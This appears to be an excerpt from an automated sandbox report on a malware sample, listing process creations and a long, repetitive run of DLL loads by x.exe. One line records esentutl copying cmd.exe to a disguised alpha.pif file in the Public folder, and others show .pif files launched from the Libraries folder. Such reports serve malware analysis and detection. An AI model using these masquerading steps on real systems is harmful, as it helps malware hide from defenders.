Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
